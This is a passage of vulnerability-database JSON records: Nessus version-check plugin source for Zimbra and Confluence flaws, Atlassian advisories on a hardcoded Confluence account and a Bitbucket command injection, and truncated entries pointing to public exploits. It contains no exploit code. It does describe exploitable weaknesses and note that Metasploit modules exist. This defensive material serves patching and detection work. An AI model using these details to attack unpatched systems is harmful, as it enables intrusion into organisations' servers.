script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cisa.gov/uscert/ncas/alerts/aa22-228a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.8.15 Patch 33, 9.0.0 Patch 26, or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-2068\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-37042\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zimbra:collaboration_suite\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zimbra_web_detect.nbin\", \"zimbra_nix_installed.nbin\");\n script_require_keys(\"installed_sw/zimbra_zcs\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::zimbra::combined_get_app_info();\n\nvar constraints = [\n {'min_version':'8.8', 'max_version':'8.8.15', 'fixed_display':'8.8.15 Patch 33', 'Patch':'33'},\n {'min_version':'9.0', 'max_version':'9.0.0', 'fixed_display':'9.0.0 Patch 26', 'Patch':'26'}\n];\n\nvcf::zimbra::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xsrf':TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T20:34:33", "description": "According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities, including the following:\n\n - A vulnerability that allows an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. These memcache commands becomes unescaped, causing an overwrite of arbitrary cached entries. (CVE-2022-27924)\n\n - Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal. (CVE-2022-27925)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-13T00:00:00", "type": "nessus", "title": "Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 31 / 9.0.0 < 9.0.0 Patch 24 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21702", "CVE-2021-39275", "CVE-2021-40438", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-27926"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:zimbra:collaboration_suite"], "id": "ZIMBRA_9_0_0_P24.NASL", "href": "https://www.tenable.com/plugins/nessus/163072", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163072);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21702\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2022-27924\",\n \"CVE-2022-27925\",\n \"CVE-2022-27926\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/04/24\");\n script_xref(name:\"IAVA\", value:\"2022-A-0268-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 31 / 9.0.0 < 9.0.0 Patch 24 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities,\nincluding the following:\n\n - A vulnerability that allows an unauthenticated attacker to inject arbitrary memcache commands into a\n targeted instance. These memcache commands becomes unescaped, causing an overwrite of arbitrary cached\n entries. (CVE-2022-27924)\n\n - Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and\n extracts files from it. An authenticated user with administrator rights has the ability to upload\n arbitrary files to the system, leading to directory traversal. (CVE-2022-27925)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Security_Center\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.8.15 Patch 31, 9.0.0 Patch 24, or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-39275\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zimbra:collaboration_suite\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zimbra_web_detect.nbin\", \"zimbra_nix_installed.nbin\");\n script_require_keys(\"installed_sw/zimbra_zcs\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::zimbra::combined_get_app_info();\n\nvar constraints = [\n {'min_version':'8.8', 'max_version':'8.8.15', 'fixed_display':'8.8.15 Patch 31', 'Patch':'31'},\n {'min_version':'9.0', 'max_version':'9.0.0', 'fixed_display':'9.0.0 Patch 24', 'Patch':'24'}\n];\n\nvcf::zimbra::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:40:01", "description": "According to its self-reported version number, the Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-01-04T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CONFSERVER-79016)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-07T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "ATLASSIAN_CONFLUENCE_CONFSERVER-79016.NASL", "href": "https://www.tenable.com/plugins/nessus/169509", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(169509);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/07\");\n\n script_cve_id(\"CVE-2022-26134\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/06\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0023\");\n\n script_name(english:\"Atlassian Confluence Command Injection (CONFSERVER-79016)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a command injection\nvulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence running\non the remote host is affected by a command injection vulnerability. A remote,\nunauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on\nthe application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-79016\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1df4fa0\");\n # https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5cd914cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Namespace OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/01/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_win_installed.nbin\", \"confluence_nix_installed.nbin\", \"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/Atlassian Confluence\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_name = 'Atlassian Confluence';\n\nvar app_info = vcf::combined_get_app_info(app:app_name);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n {\"min_version\": \"1.3.0\", \"fixed_version\": \"7.4.17\", \"fixed_display\": \"7.4.17 / 7.18.1\"},\n {\"min_version\": \"7.5.0\", \"fixed_version\": \"7.13.7\", \"fixed_display\": \"7.13.7 / 7.18.1\"},\n {\"min_version\": \"7.14.0\", \"fixed_version\": \"7.14.3\", \"fixed_display\": \"7.14.3 / 7.18.1\"},\n {\"min_version\": \"7.15.0\", \"fixed_version\": \"7.15.2\", \"fixed_display\": \"7.15.2 / 7.18.1\"},\n {\"min_version\": \"7.16.0\", \"fixed_version\": \"7.16.4\", \"fixed_display\": \"7.16.4 / 7.18.1\"},\n {\"min_version\": \"7.17.0\", \"fixed_version\": \"7.17.4\", \"fixed_display\": \"7.17.4 / 7.18.1\"},\n {\"min_version\": \"7.18.0\", \"fixed_version\": \"7.18.1\", \"fixed_display\": \"7.18.1\"}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "atlassian": [{"lastseen": "2023-06-06T15:36:37", "description": "(i) *Update:* This advisory has been updated since its original publication.\r\n\r\n2022/08/01 12:00 PM PDT (Pacific Time, -7 hours)\r\n * {color:#172b4d}Updated the\u00a0_Remediation_ section to note that if the {{disabledsystemuser}} account is manually deleted, the app must also be updated or uninstalled to ensure the account does not get recreated{color}\r\n\r\n2022/08/01 11:00 AM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Summary of Vulnerability_ section to note the email service provider for the {{dontdeletethisuser@email.com}}\u00a0account has confirmed the account has been blocked\u00a0\r\n\r\n2022/07/30 1:15 PM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Summary of Vulnerability_ section to note that instances that have not remediated this vulnerability per the\u00a0_Remediation_ section below may send email notifications from Confluence to a third party email address\r\n * Additional details are available in [Confluence Security Advisory 2022-07-20|https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html]\r\n\r\n2022/07/22 9:30 AM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Remediation_ section to explain only option 2 can be used for Confluence Server and Data Center instances configured to use a read-only external directory\r\n * Added a link to a page of frequently asked questions about CVE-2022-26138\r\n\r\n2022/07/21 8:30 AM PDT (Pacific Time, -7 hours)\r\n * An external party has discovered and publicly disclosed the hardcoded password on Twitter. *It is important to remediate this vulnerability on affected systems immediately.*\r\n * The Vulnerability Summary section has been updated to include this new information\r\n\r\nh3. Vulnerability Summary\r\n\r\nWhen the [Questions for Confluence app|https://marketplace.atlassian.com/apps/1211644/questions-for-confluence?hosting=server&tab=overview] is enabled on Confluence Server or Data Center, it creates a Confluence user account with the username {{{}disabledsystemuser{}}}. This account is intended to aid administrators that are migrating data from the app to Confluence Cloud. The {{disabledsystemuser}} account is created with a hardcoded password and is added to the {{confluence-users}} group, which allows viewing and editing all non-restricted pages within Confluence [by default|https://confluence.atlassian.com/doc/confluence-groups-139478.html]. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence.\r\n\r\nThe {{disabledsystemuser}} account is configured with a third party email address ({{{}dontdeletethisuser@email.com{}}}) that is not controlled by Atlassian. If this vulnerability has not been remediated per the _Fixes_\u00a0section below, an affected instance\u00a0configured\u00a0to send\u00a0[notifications|https://confluence.atlassian.com/doc/email-notifications-145162.html]\u00a0will email that address.\u00a0One example\u00a0of an email notification is\u00a0[Recommended Updates Notifications|https://confluence.atlassian.com/doc/configuring-the-recommended-updates-email-notification-281480712.html], which contains a report of the top pages from Confluence spaces the user has permissions to view. mail.com, the free email provider that manages the {{dontdeletethisuser@email.com}}\u00a0account, has confirmed to Atlassian that the account has been blocked. This means it cannot be accessed by anyone unauthorized and cannot send or receive any new messages.\r\n\r\n(!) An external party has discovered and publicly disclosed the hardcoded password on Twitter. Refer to the _Remediation_ section below for guidance on how to remediate this vulnerability.\r\nh3. How To Determine If You Are Affected\r\n\r\nA Confluence Server or Data Center instance is affected if it has an active user account with the following information:\r\n * User: {{disabledsystemuser}}\r\n * Username: {{disabledsystemuser}}\r\n * Email: {{dontdeletethisuser@email.com}}\r\n\r\nIf this account does not show up in the list of active users, the Confluence instance is not affected.\r\nh3. Remediation\r\n\r\n(!) Uninstalling the Questions for Confluence app does *not* remediate this vulnerability. The {{disabledsystemuser}} account does not automatically get removed after the app has been uninstalled. If you have verified a Confluence Server or Data Center instance is affected, two equally effective ways to remediate this vulnerability are listed below. (!)\r\nh4. Option 1: Update to a non-vulnerable version of Questions for Confluence\r\n\r\nUpdate the Questions for Confluence app to a fixed version:\r\n * 2.7.x >= 2.7.38\r\n * Versions >= 3.0.5\r\n\r\nFor more information on how to update an app, refer to [Atlassian's documentation|https://confluence.atlassian.com/upm/updating-apps-273875710.html].\r\n\r\nFixed versions of the Questions for Confluence app stop creating the {{disabledsystemuser}} user account, and remove it from the system if it has already been created. Migrating data from the app to Confluence Cloud is now a manual process.\r\n\r\n(!) If Confluence is configured to use a read-only external directory (e.g. Atlassian Crowd), you will need to follow Option 2 below.\r\nh4. Option 2: Disable or delete the {{disabledsystemuser}} account\r\n\r\nSearch for the {{disabledsystemuser}} account and either disable it or delete it. For instructions on how to disable or delete an account (including an explanation of the differences between the two options), refer to [Atlassian's documentation|https://confluence.atlassian.com/doc/delete-or-disable-users-138318.html].\r\n\r\nIf you choose to delete the {{disabledsystemuser}} account, you must also [uninstall|https://confluence.atlassian.com/upm/uninstalling-apps-273875709.html] or upgrade the Questions for Confluence app to a non-vulnerable version. *Failure to do this could result in the account being recreated after it has been deleted.*\r\n\r\nIf Confluence is configured to use a read-only external directory, refer to the [Delete from a read-only external directory, or multiple external directories section|https://confluence.atlassian.com/doc/delete-or-disable-users-138318.html#DeleteorDisableUsers-Deletefromaread-onlyexternaldirectory,ormultipleexternaldirectories]\u00a0from the same document\r\nh3. Frequently Asked Questions\r\n\r\nWe'll update the\u00a0[FAQ for CVE-2022-26138|https://confluence.atlassian.com/kb/faq-for-cve-2022-26138-1141988423.html]\u00a0with answers for commonly asked questions.\r\nh3. Security Advisory\r\n\r\nFor additional details, refer to [Confluence Security Advisory 2022-07-20|https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html].\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-08T17:06:14", "type": "atlassian", "title": "Questions For Confluence App - Hardcoded Password", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2023-02-21T15:41:00", "id": "CONFSERVER-79483", "href": "https://jira.atlassian.com/browse/CONFSERVER-79483", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:43:22", "description": "h3. Command injection vulnerability through malicious HTTP requests\r\n\r\nThere is a command injection vulnerability in multiple API endpoints of Bitbucket Server and Data Center. An attacker with access to a public Bitbucket repository or with *read* permissions to a private one can execute arbitrary code by sending a malicious HTTP request.\r\n\r\nAll versions released after 6.10.17 including 7.0.0 and newer are affected, this means that all instances that are running any versions between 7.0.0 and 8.3.0 inclusive can be exploited by this vulnerability.\r\n\r\nThe full list of affected versions can be found in the \"Affects Version/s:\" field of this report.\r\nh4. Affected versions:\r\n\r\nAll Bitbucket Server and Data Center versions from 7.0.0 to 8.3.0 inclusive.\r\nh4. Fixed versions:\r\n||*Supported Version*||*Bug Fix Release*||\r\n|[Bitbucket Server and Data Center 7.6|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Server+7.6+release+notes]|7.6.17 ([LTS|https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html]) or newer|\r\n|[Bitbucket Server and Data Center 7.17|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+7.17+release+notes]|7.17.10 ([LTS|https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html]) or newer|\r\n|[Bitbucket Server and Data Center 7.21|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+7.21+release+notes]|7.21.4 ([LTS|https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html]) or newer|\r\n|[Bitbucket Server and Data Center 8.0|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+8.0+release+notes]|8.0.3 or newer|\r\n|[Bitbucket Server and Data Center 8.1|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+8.1+release+notes]|8.1.3 or newer|\r\n|[Bitbucket Server and Data Center 8.2|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+8.2+release+notes]|8.2.2 or newer|\r\n|[Bitbucket Server and Data Center 8.3|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+8.3+release+notes]|8.3.1 or newer|\r\nh4. Bitbucket Mesh\r\n\r\nIf you have configured Bitbucket Mesh nodes, these will need to be updated with to the corresponding version of Mesh that includes the fix. To find the version of Mesh compatible with the Bitbucket Data Center version, please check the [+compatibility matrix+|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Mesh+compatibility+matrix]. You can download the corresponding version from the [download centre|https://www.atlassian.com/software/bitbucket/download-mesh-archives].\r\n\r\n\u00a0\r\n\r\nFor additional details, please see full advisory here: [https://confluence.atlassian.com/pages/viewpage.action?spaceKey=SECURITY&title=August+2022%3A+Atlassian+Security+Advisories+Overview]\r\n\r\nThis vulnerability was discovered by\u00a0[@TheGrandPew|https://twitter.com/TheGrandPew]\u00a0and reported via our Bug Bounty program.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T22:40:01", "type": "atlassian", "title": "Critical severity command injection vulnerability - CVE-2022-36804", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2022-12-06T14:52:37", "id": "BSERV-13438", "href": "https://jira.atlassian.com/browse/BSERV-13438", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2023-06-06T15:27:21", "description": "# CVE-2022-26138\n\n# 1.\u7b80\u4ecb\nConfluence Hardcoded Password POC\n\n#...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-30T07:14:52", "type": "githubexploit", "title": "Exploit for Use of Hard-coded Credentials in Atlassian Questions For Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2023-04-27T05:22:39", "id": "120220D8-2281-57EE-BD84-1A33B8841E56", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:27:28", "description": "# Confluence-Question-CVE-2022-26138\nAtlassian Confluence Server...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T09:48:21", "type": "githubexploit", "title": "Exploit for Use of Hard-coded Credentials in Atlassian Questions For Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-09-21T21:50:55", "id": "E443E98A-3304-54B8-97FD-0FEF9DA283B3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:00:11", "description": "# CVE-2022-37042\n<img width=\"918\" alt=\"image\" src=\"https://user-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-25T10:43:13", "type": "githubexploit", "title": "Exploit for Improper Authentication in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 